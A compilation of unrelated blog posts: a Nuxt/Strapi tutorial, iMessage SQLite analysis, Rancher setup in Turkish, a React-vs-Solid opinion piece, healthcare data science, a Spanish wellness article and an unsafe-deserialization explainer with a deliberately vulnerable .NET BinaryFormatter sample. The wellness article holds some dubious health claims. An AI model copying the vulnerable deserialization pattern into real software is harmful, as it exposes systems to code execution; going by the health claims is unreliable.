console.log(ctx.request.params.id)
const data = await strapi.service('api::article.article').findOne(ctx.request.params.id, {
populate: ['Image', 'users_permissions_user']
})
delete data.users_permissions_user.password
return data
}
}));
```
What have manually populated the `Image` and `users_permission_user` fields. Then, we’ll delete the password so that it is not passed along in the response to the client.
**To Build the Create Article Page**
- Execute the following lines of code to create a `New.vue` file in the pages directory.
```shell
touch New.vue
```
- Fill up the New.vue file with the following lines of code
```js
<template>
<div class="w-4/5 mx-auto md:w-1/2 text-center my-12 overflow-hidden">
<form ref="form" @submit="createPost">
<h2 class="font-bold text-2xl md:text-4xl mt-5">Create a new post</h2>
<div>
<input
v-model="form.name"
name="Title"
type="text"
placeholder="title"
class="p-3 my-3 border w-full"
/>
</div>
<div>
<input
v-model="form.description"
name="description"
type="text"
placeholder="description"
class="p-3 my-3 border w-full"
/>
</div>
<div>
<textarea
v-model="form.content"
name="Content"
cols="30"
rows="10"
class="p-3 my-3 border w-full"
></textarea>
</div>
<div>
<input
type="file"
name="Image"
class="p-3 my-3 border w-full"
@change="assignFileInput()"
/>
</div>
<div>
<button
class="button--green"
:disabled="
form.name === '' ||
form.description === '' ||
form.content === '' ||
fileInput === ''
"
type="submit"
>
Create
</button>
</div>
</form>
</div>
</template>
<script>
export default {
data() {
return {
form: {
name: '',
description: '',
content: '',
users_permissions_user: this.$strapi.user.id,
},
fileInput: '',
}
},
methods: {
async createPost(e) {
const formData = new FormData()
let file
const formElements = this.$refs.form.elements
formElements.forEach((el, i) => {
if (el.type === 'file') {
file = el.files[0]
}
})
formData.append(`files.Image`, file, file.name)
formData.append('data', JSON.stringify(this.form))
e.preventDefault()
await this.$strapi.$articles.create(formData)
this.$nuxt.$router.push('/articles')
},
assignFileInput() {
const formElements = this.$refs.form.elements
formElements.forEach((el, i) => {
if (el.type === 'file') {
this.fileInput = el.files[0] !== undefined ? el.files[0].name : ''
}
})
},
},
middleware({ $strapi, redirect }) {
if (!$strapi.user) {
redirect('/articles')
}
},
}
</script>
<style></style>
```
We just created the logic to enable authenticated users to create new articles. The logic is complicated, especially the *file upload* logic, so let’s work through it step by step.
We built a content creation form as usual, with fields for title, description, image upload and content, and the create button.
1. Using the v-model directive, we linked up the fields with their respective data property; file inputs do not support the v-model directive, so we’ve built a workaround.
2. What we’ve done is create an assignInput()` method that is invoked when the field input with file type changes.
3. When a change occurs, we check if the type of the form element that changed is a file. If it is, we assign the name of the selected file as the value of `fileInput`.
Next, the `createPost()` method allows users create articles.
1. Using `FormData` we append the form object from the page’s data property in string form to `FormData` with a data property.
2. We do the same thing for file input but we append it to FormData with a `files.image` property. This is because, for multipart data, Strapi requires that the property be preceded by files i.e `files.${fieldname}` and our fieldname from the article content-type is image.
With all that done, we should have our create article logic working fine.
[The frontend repo for this tutorial can be found here](https://github.com/oviecodes/nuxt-strapi-auth)
[The backend repo for this tutorial can be found here](https://github.com/oviecodes/strapi-auth/tree/strapi-v4)[.](https://github.com/oviecodes/strapi-auth/tree/strapi-v4)
[](https://github.com/oviecodes/strapi-auth/tree/strapi-v4)
We’ve come to the end of this tutorial. By now, you have what it takes to tackle Strapi authentication with NuxtJs in your arsenal.
| shadaw11 |
1,005,679 | Analyzing iMessage with SQL | SQLite is an often overlooked flavor of SQL engines. Some have suggested it is the most prolific SQL... | 0 | 2022-03-01T18:36:10 | https://arctype.com/blog/search-imessage | database, tutorial, programming, sqlite | SQLite is an often overlooked flavor of SQL engines. Some have suggested it is the most prolific SQL engine in existence due to its highly flexible nature and ability to run on almost any platform with limited resources. Unlike other SQL engines like MySQL, PostgreSQL, MSSQL, or Oracle, SQLite runs without a server. SQLite does not rely on a data directory or a constantly running daemon: a database is encapsulated in a single file.
## SQLite and iMessage
iMessage is one of the most [popular messaging platforms](https://techplanet.today/post/why-imessage-is-so-popular) today, largely because it is built into iOS and Mac devices. Since its release, it has evolved significantly. But, at its core, it is simply an instant messaging platform. iMessage uses SQLite in the background to store relational data about messages, conversations, and their participants.
As a long-time Apple user, I have backed up and transferred my iPhone data since my first time using an iPhone, which was November 10, 2009. Because I have been digitally hoarding my text data for so long, my iMessage database is nearly 1GB in size.
Until a few years ago, the built-in search feature for iMessage was [very limited and buggy](https://pxlnv.com/linklog/messages-search/). Although it has recently improved significantly, it is, like nearly any end-user tool, very limited in how you can query it. Those of us who frequently work with data that is trapped behind a limited front-end often wish we could get direct access to the SQL database. Fortunately, the iMessage database is not inaccessible - in fact, it is very easy to access.
### Finding the iMessage SQL Database
#### On Your Mac
If you have iMessage enabled on your Mac as well as your iPhone, you have 2 different databases from which to choose. The database on your Mac is very easy to find, as it is simply under `~/Library/Messages/chat.db`. If you do not use your Mac for iMessage, or, as in my case, your Mac iMessages do not go as far back, you can extract your iPhone's database by performing a backup to your Mac.
#### On Your iPhone
Follow these instructions to extract your iPhone's iMessage database:
1. Open Finder and select your iPhone under "Locations".
2. Find the "Backups" section and select "Back up all of the data on your iPhone to this Mac", then press Back Up Now to immediately create a new backup. This process may take a while.
3. Once it is complete, you will find the SQLite file under `/Users/[username]/Library/Application Support/MobileSync/Backup/[backup name]/3d/3d0d7e5fb2ce288813306e4d4636395e047a3d28`.
4. If you plan to open this database with Arctype, you'll want to copy and rename the file with a `.db` extension to indicate that it is a SQLite file.
## Getting Started with SQLite
Unlike most SQL servers, you do not need a connection string, host, or username to connect to a SQLite database. All you need to do is point your SQL client to the database file. [Arctype](arctype.com) makes it simple and convenient to load in SQLite databases within the same workspace as your other connections.
### With Arctype

1. Under the Connections dropdown, select "Add new data source"
2. Select "SQLite"
3. Find the SQLite database file. The file must have a .sqlite3 or .db extension for Arctype to open it.
More detailed instructions can be found in the [Arctype Docs](https://docs.arctype.com/connect/postgresql).
### With Command Line
From a UNIX terminal, type `sqlite3 [filename]`.
## iMessage Schema
One of my favorite parts about Arctype is how easy it is to analyze database schema. I'm a long-time user of command-line tools and old-school editors, but sometimes having a more visually interactive tool is a lifesaver. Let's dig into the schema Apple has created for iMessage. Today we will focus on the `chat`, `message`, and `handle` tables, as well as a few join tables to connect related records.

Note that I have created a custom view called `handle2` which adds a field `id2` that obfuscates the phone numbers and email addresses of my personal contacts, and you will see this view referenced in the examples in this article.
## Digging Into iMessage
Let's write some queries and makes some observations that would not be possible without direct SQL access.
### Pique Your Nostalgia with Old Messages
To get started, let's begin with a simple query to view your first 50 messages. If you have chat threads that go back years and years, there is no easy way to access early messages from your iPhone or Mac.
The interface on both platforms requires you to scroll back by about 25 messages at a time. This is prohibitively time-consuming and can result in a crash or reset if the user sends you a new message while you're scrolled back.
Fortunately, we have custom SQL to save us:
```
select
h.id2 as sender_name,
m.text as message_body
from
message m
join handle2 h on h.rowid = m.handle_id
order by
m.date
limit
50;
```

`handle.id` represents the readable identifier for the user. It will be either a phone number or an email address.
### Rate Your Friendships with SQL
Let's use SQL to find out who our best friends are. Assuming you view the quality of friendships as a function of the quantity of sent text messages, this should be very accurate!
First, let's divide the number of messages that are `from_me` by those that are not to produce a reply ratio. This query shows the top 10 people we have been messaging by the total amount of messages, as well as the reply ratio.
Multiplication by 1.0 casts to the `REAL` data type to avoid integer division, which would result in 1 or 0 instead of a decimal. You can use the link [here](https://datacomy.com/sql/sqlite/division/) to see the rules for integer division in SQLite.
```
select
h.id2,
count(1) as cnt,
round(
sum(
case
when m.is_from_me then 1
else 0
end
) * 1.0 / count(1) * 100.0,
2
)
from
message m
join handle2 h on h.rowid = m.handle_id
group by
h.id
order by
cnt desc
limit
10;
```

One issue with this analysis is that fewer sent messages does not necessarily imply fewer words sent. Let's add some more fields to get a better insight.
Here we can see the total amount of characters sent and received, the average length of text message sent and received, the total ratio of characters sent and received, and the reply ratio. In my case, people from whom I tend to receive more messages also send longer messages than me.
```
select
h.id,
count(1) as cnt,
sum(length(m.text)) as chars,
sum(length(m.text)) filter (where m.is_from_me) as chars_sent,
sum(length(m.text)) filter (where not m.is_from_me) as chars_received,
round(avg(length(m.text)) filter (where m.is_from_me)) as avg_length_sent,
round(avg(length(m.text)) filter (where not m.is_from_me)) as avg_length_received,
round((sum(length(m.text)) filter (where m.is_from_me) * 1.0 / sum(length(m.text)) filter (where not m.is_from_me)), 2) as characters_sent_ratio,
round((count(1) filter (where m.is_from_me)) * 1.0 / (count(1) filter (where not m.is_from_me)), 2) as reply_ratio
from
message m
join handle h on h.rowid = m.handle_id
group by
h.id
order by
cnt desc
limit
10;
```

This query makes heavy use of [aggregate filters](https://modern-sql.com/feature/filter). Aggregate filters allow you to use an aggregate function on only a part of the data by specifying a `WHERE` clause to filter out unwanted records.
### Examining iMessage Reactions
There are 2 newer iMessage features whose implementations, in the context of their schema design, are interesting to look into. Recently [an announcement was made](https://www.droid-life.com/2022/01/31/imessage-reactions-google-android/) that Android phones will be able to show iMessage "reactions" properly. Historically, if you send an iMessage reaction to a non-Apple device, it will show up as a textual addition instead of an icon.

With the announcement of the new compatibility with Android devices, I was curious to learn how the current implementation of the feature works.
I `SELECT`ed a few records with and without a reaction and compared the results. I discovered that the `associated_message_type` column was usually set to 0, but in messages with a reaction, it was an integer value between 2000-2005. I also noticed that `associated_message_guid` was present. Apple appears to be using 2000-2005 for its 5 reaction types, 3000-3005 for when a user removed a reaction, and 3 for an Apple Pay request.

From this investigation, it appears that reactions are sent as iMessages with the reaction's textual equivalent appended and a foreign key relation to the parent message. This allows the messages to seamlessly be sent and received by non-Apple devices.
If the message is sent over SMS, the metadata linking the reaction to the message it references is simply lost. If the device is iMessage capable, Apple devices will ignore the `text` part of the message, find the associated message and add the proper reaction as a visual overlay.
Note that the `message` table includes both a `ROWID` and a `guid`. `ROWID` is a typical auto-increment integer `id` field, which is useful for joining on within the local database. However, the auto-incremented primary key will not be the same for the same message across devices. The `GUID` is globally unique, generated by the author of the message, and sent to all of its recipients. This allows foreign key references across different databases, devices, and users. For more information about the utility of GUIDs, check out [this article](__GHOST_URL__/postgres-uuid/).
### Find Your Most Popular Group Chats
Group chats are stored in the `chat` table. Join tables `chat_handle_join` and `chat_message_join` are used to associate users and messages, respectively, with group chats. Here's a query to find out most used group chats (chat with > 1 members) and the identities of their participants.
```
select
group_concat(distinct h.id2) as participants,
count(m. "ROWID") as message_count
from
chat c
join chat_handle_join chj on chj.chat_id = c."ROWID"
join handle2 h on h. "ROWID" = chj.handle_id
join chat_message_join cmj on cmj.chat_id = c."ROWID"
join message m on m. "ROWID" = cmj.message_id
group by
c."ROWID"
having
count(distinct h.id) > 1
order by
message_count desc
limit
10
```


The `group_concat` function, which is familiar from MySQL by the same name and familiar to PostgreSQL users as `string_agg`, is an aggregate function that concatenates strings together. See more on how it can be used within SQLite [here](https://www.sqlite.org/lang_aggfunc.html#group_concat).
The `HAVING` clause is similar to a `WHERE` clause but operates on aggregate functions. If you've wanted to write a query conditional on an aggregate but are not able to inside of your `WHERE` clause, `HAVING` is [there for you](https://www.sqlitetutorial.net/sqlite-having/).
## Conclusion
SQLite is a powerful tool whose prolific reach across devices and numerous use cases make it one of the most impressive software projects around. If you're curious about what's behind the scenes, SQLite's [source code](https://sqlite.org/src/doc/trunk/README.md) is well known to be well-organized and fun (well, to some of us) to peek into.
iMessage is just one of many pieces of software that rely on SQLite and are used by millions of end-users. You can try out a SQL client [like Arctype](arctype.com) for free and start exploring the databases that power the tools you use daily! | rettx |
1,189,689 | Temel Rancher kurulumu | Rancher hakkında temel ve sözel bir dokümanı "Rancher'a giriş" olarak Medium üzerinde paylaşmıştım.... | 0 | 2022-09-10T14:01:14 | https://dev.to/aciklab/temel-rancher-kurulumu-9hb | rancher, k8s, kubernetes, docker | Rancher hakkında temel ve sözel bir dokümanı "[Rancher'a giriş](https://aliorhun.medium.com/ranchera-giri%C5%9F-390506d68b2)" olarak Medium üzerinde paylaşmıştım. Şimdi ise hedefimiz elimizi biraz daha kullanıma alıştırmak olacak.
Öncelikle temel olarak sanal makine üzerinde Ubuntu 20.04 sunucu sürümünü kullandığımı söyleyebilirim. Farklı dağıtımda farklı bağımlılıklar olabileceği için yeni başlıyor iseniz aynı sürümden devam etmek daha doğru olacaktır.
# Ön hazırlıklar ve Docker kurulumu
Sanal makineye kendi kullanıcınızla giriş yaptıktan sonra yönetici hesabına geçerek aşağıdaki paketi yüklememiz gerekiyor:
```bash
sudo apt install docker.io
```
Bu adımdan sonra docker kurulmuş olacak fakat docker'ın sudo olmayan kullanıcı ile de çalıştırılmasına önem veriyorum bunun için kendi kullanıcınızı belirterek aşağıdaki iki komutu da yönetici yetkisi ile uygulayalım.
```bash
sudo usermod -aG docker KULLANICIADI
newgrp docker
```
Açılışta docker'ın açılması için ise aşağıdaki komutu uygulayabilirsiniz:
```bash
sudo systemctl enable docker
```
Bu adımdan sonra sanal makine yeniden başlatılmalı. Bu kısım özellikle yetkisiz kullanıcının docker'ı kullanmaya yetkisini görebilmek için önemli.
# Rancher kurulumu
Sistem yeniden başladıktan sonra artık yönetici yetkisini kullanmayacağız. Normal kullanıcımızla girdikten sonra aşağıdaki komutu kullanarak rancher server'ı kuruyoruz.
```bash
docker run -d --name=rancher-server --restart=unless-stopped -p 80:80 -p 443:443 --privileged rancher/rancher:stable
```
Docker imajları indirilip ayağa kaldırılmaya başladığında yaklaşık 1 dakika filan zaman alabilir ki bundan sonra 443 ve 80 portlarından web arayüzünden giriş yapılabilmesi sağlanacaktır.
# Rancher web arayüzüne giriş
Yazı yazıldığında son kararlı sürüm v2.6.8 olarak gözükmekte olup web tarayıcınızdan sanal makinenin IP adresine girdiğinizde size parolanıza bakmanızı söyleyecektir. Bunun için aşağıdaki komutu çalıştırmanız gerekmekte. Eğer rancher sorunsuz ayağa kalktıysa bu da gözüküyor olması lazım.
```bash
docker logs rancher-server 2>&1 | grep "Bootstrap Password:"
```
Parolayı girip, yeni ve zor parola ile değişimi yaptıktan sonra aşağıdaki gibi bir ekranla karşılaşacaksınız. Tabi ki bende koyu modu seçili olduğu için farklılık gösterecektir.

Ve tabi ki buradaki kalabalıkları sağ üst kısımlarında bulunan çarpılarla kapatıp asıl işi olan kümeleri listeleyecek hale getirebilirsiniz.
# "local" küme
Web arayüzüne girdiğinizde ilk olarak dikkat çekebilecek nokta k3s Kubernetes provider'ı ile yerel bir küme oluşturulmuş olması olacaktır. Bu şekilde kubernetes'in nimetlerini kullanmaya başlayabiliyorsunuz.
Bu kümenin içerisinde aşağıdaki Kubernetes bileşenlerinin bulunduğunu söyleyebiliriz:
* Etcd
* Scheduler
* Controller Manager
Küme içerisine girdikten sonra kaç pod, kaç çekirdek CPU ve kaç hafıza olduğuna dair temel bilgilere ulaşabileceksiniz. Tabi ki daha sonra helm paket yöneticisi ile birlikte Prometheus ve Grafana ile de daha detaylı bilgileri alabileceğiniz bir yapı oluşturabilirsiniz.
Bu konularla ilgili birkaç yazı ile de devam etmeyi düşünüyorum ama giriş konusunda bu adımların anlaşılması en önemli nokta olacaktır. | aliorhun |
1,190,444 | React vs Solid - Seriously? | There is no contest. SolidJS is faster, better, and easier to learn and maintain. If you're already... | 0 | 2022-09-11T19:16:25 | https://dev.to/chadsteele/react-vs-solid-seriously-4j7p | react, solidjs, redux, javascript | There is no contest.
SolidJS is faster, better, and easier to learn and maintain. If you're already a React developer, you're already a Solid developer. You'll just type a lot less in Solid and spend less time debugging. If your company is still investing in React in any way at all, you're wasting lots of time and money. Enjoy.

Start here https://www.solidjs.com/tutorial/introduction_basics
It's fun!
| chadsteele |
1,210,426 | Know The Application of Data Science in the Healthcare Industry | The individual's health is now separated from the frequent life-or-death decisions made at the... | 0 | 2022-10-04T06:14:27 | https://dev.to/poo727/know-the-application-of-data-science-in-the-healthcare-industry-1am5 | datascience, datasciencecourse, datasciencecourseinbangalore, artificialintelligencecourse |
The individual's health is now separated from the frequent life-or-death decisions made at the insurance level of the healthcare system by many levels. While it makes sense for insurance companies, which are trying to limit costs, to serve as a gatekeeper for authorizing medical treatments, the process is usually managed by people who are neither licensed medical professionals nor experts in the field of medicine. The severe compliance requirements placed on medical personnel are one of the main problems with Health care. There should be checks and balances between the medical profession and the pooled risk insurance corporations.
For example, obtaining pre-authorizations for medical treatment is still frequently done via fax machines. It seems incredible that such a dated approach, which can decide whether or not someone receives medical treatment, is still in use in the 21st century when almost everything is now shared digitally. As each health insurance has variable degrees of coverage for a wide range of procedures and treatments, doctors, physician assistants, and other medical office personnel spend upwards of 20 hours each week contacting and arranging with the many health insurers.
How Can Data Science Help Improve the Health Care System?
The high cost and fragmented nature of American healthcare may be addressed by technology in general and machine learning or AI in particular. Massive amounts of data are generated as a result of the health care system. Data scientists can use them to enhance patient outcomes, help people more likely to develop chronic diseases change their behaviors, advance precision medicine, and simplify the digital sharing of patient records while still adhering to HIPAA regulations.
**Smart Rooms**
IBM and the University of Pittsburgh Medical Center started working together in 2005 to build a hospital "smart room" where connected devices would aid in streamlining the workflow of the front-line employees. The suggested features for the smart rooms range from voice-activated temperature settings alerting nurses when a patient leaves their bed and recognizing employees when they enter a patient's room. The series of tasks for a caregiver—based on their assigned role for patient care—will be analyzed and automatically prioritized concerning the specific patient's condition and treatment protocol, thanks to the use of machine learning and AI technologies.
Advanced algorithms can monitor caregiver workload management and notify patient care management when staffing levels need to be increased, when routine work is likely to be behind schedule, and when workloads should be automatically redistributed to available medical personnel. According to IBM's white paper, such implementations demonstrate a 60% improvement in nursing documentation. The majority, if not all, of data scientists' principal duties, include developing the prediction algorithms that serve as the brains of a fully functional smart room system. Although data scientists don't build front-end technological instruments, they create the algorithms needed to react to human contact, forecast and change human behavior, and provide recommendations.
**AI and Robotic Surgery**
One of the most complicated and dangerous specialities in medicine is surgery. Depending on the type of surgery, the patient may spend an hour or many hours on the operating table as the surgeon and their surgical teamwork to protect the patient's life before, during, and after the procedure. However, a surgeon's ability and physical capabilities can differ. Although it is extremely unsettling, if not terrifying, to consider that surgeons can make errors, they do. After all, they are people. Enter the world of artificial intelligence and robotics, which can keep an eye on a surgeon's movements, help with precision decision-making by giving the surgeon prompt feedback throughout the surgical process and for the patient following the surgery, and collaborate with the surgeon by performing particular surgical techniques.
Check out the IBM-accredited [artificial intelligence course in Bangalore](https://www.learnbay.co/artificial-intelligence-ai-course-training-bangalore) for detailed information.
This is a simple algorithmic implementation at first glance. The complexity of human physiology, however, necessitates collecting and analyzing vast information regarding the patient, the surgeon, and the robotic component of this intricate equation. This is where data scientists can create an intelligent algorithmic analytics system that continuously self-updates depending on the continuous environmental data stream, bridging the gap between human and robotic engagement. Data scientists can do much more than only develop AI that can teach itself to play chess by working with medical and robotics professionals; they can also contribute to saving lives.
**Wearable Technology and Behavior Modification**
Fitbits, Apple Watches, heart rate monitors, and other medical gadgets or fitness trackers that provide consumers with rapid feedback are already in popular usage, so this initially appears to be a simple algorithm. Millions of individuals use smartphones and accompanying apps to monitor their activity levels, sleeping habits, water consumption, macronutrients, blood glucose levels, and calorie expenditure. AI algorithms can be used to inform users about the predictive chance that a behavior will not only raise the risk of acquiring a chronic health condition but also increase their health care expenses. This is relevant to behavior modification and its relationship to healthcare costs. Insurers and healthcare providers can use this information to change health insurance premiums automatically and co-pay amounts or, more precisely, regulate a treatment regimen for an existing ailment.
The user is swiftly informed of their choice's financial and health repercussions, but they are still free to continue the activity or stop it immediately.
**Precision Medicine and Digital Health Records**
Training an algorithm to recognize and correctly categorize a set of photos is one of the first topics covered in many machine learning courses. The direct connection to using AI for medical imaging, where the algorithm offers real-time analytics of the CT scan, X-ray, MRI, or another image type, makes this pertinence relevant. By providing a predicted diagnosis, determining whether additional tests are necessary, outlining which tests should be included, and recommending a course of treatment, this procedure can be taken many stages further.
The patient's primary care doctor, a medical specialist, or any other healthcare practitioner to whom they have already granted access to their private health information may receive all of this information. In the end, healthcare professionals and patients must maintain their autonomy in decision-making and collaborate with AI rather than being subjected to an algorithm that, despite being programmed by people, lacks the full range of human emotions such as empathy and compassion.
Data scientists are more than just computational quantifiers which are kept in the dark about the outcomes of their labor. They serve as a human bridge between the complicated world of human psychology and physiology and the computational world of computers.
**Conclusion**
The collaborative support of data scientists who have developed experience inside the health care business can help decisions at all levels more rapidly, precisely, and with fewer layers of bureaucracy. One career path is to start as a data analyst or junior data scientist for a health insurer or other healthcare organization if you're interested in becoming a data scientist in the field but haven't yet had any exposure to it. Make sure to take [data science courses in Bangalore](https://www.learnbay.co/data-science-course-training-in-bangalore) if you are just starting your formal education as a data scientist in a healthcare organization.
| poo727 |
1,257,860 | vida saludable : 6 formas de vivir sano sin arruinarse | La vida sana es una parte importante de llevar una vida saludable. También es algo con lo que muchas... | 0 | 2022-11-15T14:34:52 | https://dev.to/bibogi22/vida-saludable-6-formas-de-vivir-sano-sin-arruinarse-m63 | vida | La vida sana es una parte importante de llevar una [vida saludable](https://inass14.blogspot.com/2022/10/como-vivir-un-estilo-de-vida-saludable.html). También es algo con lo que muchas personas luchan porque no saben cómo lograrlo. La buena noticia es que hay muchas medidas sencillas que puedes tomar para mejorar tu dieta y tu rutina de ejercicios, que te ayudarán a llevar un estilo de vida más saludable sin arruinarte. En este artículo veremos seis formas de mejorar tu salud sin arruinarte:

## Comer mucha fruta y verdura.
Las frutas y verduras son buenas para la salud. Te aportan vitaminas y minerales, que son importantes para mantener tu cuerpo sano.
Las frutas y verduras pueden comerse crudas o cocidas. Si no te gusta el sabor de algunas frutas o verduras, prueba a comerlas con otros alimentos, como huevos o alubias, en lugar de con un simple zumo de frutas (o agua). Incluso puedes mezclar bayas congeladas con cereales.
Puede que pienses que la cocción elimina los nutrientes de una comida, pero esto no es cierto: la cocción sólo aumenta la cantidad de proteínas de los alimentos porque a nuestro organismo le resulta más fácil absorber esos nutrientes cuando se combinan con aminoácidos sensibles al calor, como la leucina, la lisina, la metionina y el triptófano (que constituyen entre el 60% y el 80%, respectivamente).
## Bebe agua (al menos 8 vasos al día)
El agua es la sustancia más abundante del planeta. Constituye el 70% del peso corporal y transporta los nutrientes a todas las células del cuerpo. Sin embargo, muchas personas no beben suficiente agua cada día.
Beber mucha agua ayuda a mantener un peso corporal saludable y a prevenir la deshidratación porque ayuda a eliminar las toxinas, regula la temperatura y la presión sanguínea, fortalece los huesos y los músculos, ayuda a la digestión eliminando los productos de desecho del tracto digestivo para que puedan ser digeridos correctamente (especialmente importante si tiene algún tipo de enfermedad crónica), mejora la función renal eliminando el exceso de minerales del torrente sanguíneo para que no se conviertan en depósitos en las articulaciones o en otras partes de nuestro cuerpo, ¡y mucho más!
Beba más cuando: Está activo o hace ejercicio; al hacer ejercicio durante una hora o más se queman unas 20 onzas de líquido por libra, a diferencia de caminar sólo 10 minutos a paso ligero, que quema sólo 2 onzas por libra, debido principalmente a que no hay necesidad de suministro de oxígeno durante el movimiento, lo que requiere menos gasto de energía que estar sentado sin hacer nada más que respirar aire en nuestros pulmones hasta que nos desmayamos el tiempo suficiente antes de despertar de nuevo a la mañana siguiente sintiéndose cansado AF pero sin tener idea de por qué ...
## No beba alcohol
El alcohol es un depresor, lo que significa que ralentiza las funciones del organismo. También puede provocar alcoholismo y otros problemas de salud.
El consumo de alcohol puede dañar el hígado, por lo que debes evitarlo si ya estás enfermo o tienes una enfermedad crónica como la diabetes o la hipertensión. Beber con regularidad contribuye al aumento de peso, ya que el cuerpo necesita calorías adicionales al digerir los alimentos y fabricar nuevas células para el crecimiento (proliferación), así como mantener las células existentes (mantenimiento). Esto puede afectar a su salud a largo plazo en muchos ámbitos, como las enfermedades cardíacas, el riesgo de cáncer y la demencia en el futuro.
## No fume
Fumar es malo para la salud. Puede provocar cáncer, enfermedades cardíacas y accidentes cerebrovasculares. También daña los dientes, ya que los vuelve amarillos y los hace propensos a las caries. Aunque no fumes, hay otras formas en las que el tabaco afecta a tu cuerpo:
## Pulmones: los fumadores tienen un mayor riesgo de padecer cáncer de pulmón que los no fumadores.
Boca - Las personas que fuman tienen más caries que los no fumadores (y esto es cierto incluso si nunca han fumado).
Mantenga una actitud positiva; tenga buenos pensamientos.
Puedes mantener una actitud positiva teniendo buenos pensamientos. Un buen pensamiento es el que te da energía, te hace sentir feliz y confiado, y te ayuda a hacer las cosas de la vida que te llenan.
Debes evitar los pensamientos negativos en la medida de lo posible, porque sólo servirán para empeorar las cosas para ti y para los que te rodean. Por ejemplo, si alguien dice algo insultante sobre otra persona en su página de Facebook (sea cierto o no), trata de no pensar en ello y, en cambio, piensa en lo buenos que son los demás en la escuela o el trabajo.
## Deshazte del estrés. Aprende a relajarte, quizás con meditación o yoga.
Un estilo de vida saludable va más allá de los alimentos que se consumen. Se trata de cómo te sientes y de lo que el estrés hace a tu cuerpo. El estrés puede causar muchos problemas de salud, como enfermedades del corazón y diabetes.
El estrés puede estar causado por muchas cosas, como el trabajo, el dinero, la familia u otras responsabilidades. Si estas cosas te estresan demasiado, puede ser el momento de cambiar. Las técnicas de relajación -como la meditación o el yoga- pueden ayudar a aliviar el estrés y mejorar tu bienestar mental general
## Haga ejercicio regularmente, incluso cuando esté enfermo.
El ejercicio es una forma estupenda de mantenerse sano. Cuando se está enfermo, es especialmente importante aumentar el nivel de actividad y mantener el cuerpo en movimiento.
Camine por la casa o salga a pasear al aire libre si puede. Si está resfriado o tiene gripe, intente caminar lo más despacio posible para que su cuerpo no se caliente ni sude demasiado, ¡eso puede empeorar las cosas!
Haz ejercicios de estiramiento como los de este vídeo: "Los estiramientos te harán sentir mejor cuando tengas gripe". Puede ser doloroso al principio, pero una vez que se acostumbre a ello (y posiblemente incluso lo disfrute), ¡hacer estiramientos le ayudará a prevenir lesiones cuando haga ejercicio más adelante!
- Pasa tiempo con tus amigos y familiares, pueden ayudarte en los momentos difíciles.
- Pasar tiempo con tus amigos y familiares puede ayudarte a sentirte mejor.
Es difícil estar solo cuando se está enfermo, así que es importante pasar tiempo con tus seres queridos. Si estas personas también están enfermas, entenderán por lo que estás pasando e incluso pueden tener consejos sobre cómo mejorar más rápido.
Para llevar: Con estos sencillos pasos puedes llevar una vida sana sin arruinarte.
Se puede llevar una vida sana sin gastar mucho dinero. Sólo hace falta algo de creatividad y los recursos adecuados. Un estilo de vida saludable es algo más que dieta y ejercicio, pero incluye ambas cosas, así como el tiempo que se pasa con los amigos y la familia.
### Conclusion
Esperamos que estos consejos le ayuden a llevar una vida sana. Recuerda que nunca es demasiado tarde para empezar a llevar un estilo de vida más saludable. Como hemos dicho antes, sólo si tomas medidas y haces pequeños cambios en tu vida podrás tener un impacto positivo en tu salud durante años.
Fuente del artículo | [BfS H22 PLuS](https://inass14.blogspot.com/) | bibogi22 |
1,264,253 | Randomizing Array Elements | If the Math.random() function didn't work for you it's okay. As a newbie to coding, it took me over a... | 0 | 2022-11-21T14:14:30 | https://dev.to/juliannehuynh/randomizing-array-elements-21o5 | javascript, vscode, programming, firstpost | If the Math.random() function didn't work for you it's okay. As a newbie to coding, it took me over a day for it to work it's magic. There are a number of ways to create a random return but I found this to be the cleanest way that made the most sense. The syntax behind this code may seem a little dauting but once you break it down it's much simpler than you think.

Here we have an array of dog names. In order to randomize the dogs' names the function was called on the array, dogs. The function Math.floor(), essentially rounds down an integer, but since these are names it won't return just a quarter of the name. To generate a random return of an element of the array Math.random() is multiplied to the length of the array, array.length. The length covers the entirety of the array of all the elements.
| juliannehuynh |
1,292,038 | An Unsafe Deserialization Vulnerability and Types of Deserialization | Deserialization Unsafe Deserialization (also referred to as Insecure Deserialization) is... | 0 | 2022-12-10T20:30:31 | https://dev.to/tutorialboy/an-unsafe-deserialization-vulnerability-and-types-of-deserialization-1mcg |

## Deserialization
Unsafe Deserialization (also referred to as Insecure Deserialization) is a vulnerability wherein malformed and untrusted data input is insecurely deserialized by an application. It is exploited to hijack the logic flow of the application end might result in the execution of arbitrary code. Although this isn’t exactly a simple attack to employ, it featured in OWASP’s Top 10 most recent iteration as part of the Software and Data Integrity Failures risk, due to the severity of impact upon compromise.

The process of converting an object state or data structure into a storable or transmissible format is called serialization. Deserialization is its opposite - the process of extracting the serialized data to reconstruct the original object version.
Unsafe Deserialization issues arise when an attacker is able to pass ad hoc malicious data into user-supplied data to be deserialized. This could result in arbitrary object injection into the application that might influence the correct target behavior.
## Impact
A successful Unsafe Deserialization attack can result in the full compromise of the confidentiality, integrity, and availability of the target system, and the oft-cited Equifax breach is probably the best example of the worst outcome that can arise. In Equifax’s case, an unsafe Java deserialization attack leveraging the Struts 2 framework resulted in remote code execution, which, in turn, led to the largest data breach in history.
## Prevention
It is important to consider any development project from an architectural standpoint to determine when and where serialization is necessary. If it is unnecessary, consider using a simpler format when passing data.
In cases where it is impossible to forego serialization without disrupting the application’s operational integrity, developers can implement a range of defence-in-depth measures to mitigate the chances of being exploited.
Use serialization that only permits primitive data types.
Use a serialization library that provides cryptographic signature and encryption features to ensure serialized data are obtained untainted.
Authenticate before deserializing.
Use low privilege environments to isolate and run code that deserializes.
Finally, if possible, replace object serialization with data-only serialization formats, such as JSON.
Testing
Verify that serialization is not used when communicating with untrusted clients. If this is not possible, ensure that adequate integrity controls (and possibly encryption if sensitive data is sent) are enforced to prevent deserialization attacks including object injection.
OWASP ASVS: 1.5.2, 5.5.1, 5.5.3
## Types of Deserializations

## Unsafe Deserialization in .NET
### Vulnerable Example
The .NET framework offers several instances of deserialization. Developers will likely be familiar with the following example, where some untrusted binary data is deserialized to create some objects:
```
[Serializable]
public class SomeClass
{
public string SomeProperty { get; set; }
public double SomeOtherProperty { get; set; }
}
class Program
{
static void Main(string[] args)
{
BinaryFormatter binaryFormatter = new BinaryFormatter();
MemoryStream memoryStream = new MemoryStream(File.ReadAllBytes("untrusted.file"));
SomeClass obj = (SomeClass)binaryFormatter.Deserialize(memoryStream);
Console.WriteLine(obj.SomeProperty);
Console.WriteLine(obj.SomeOtherProperty);
}
}
```
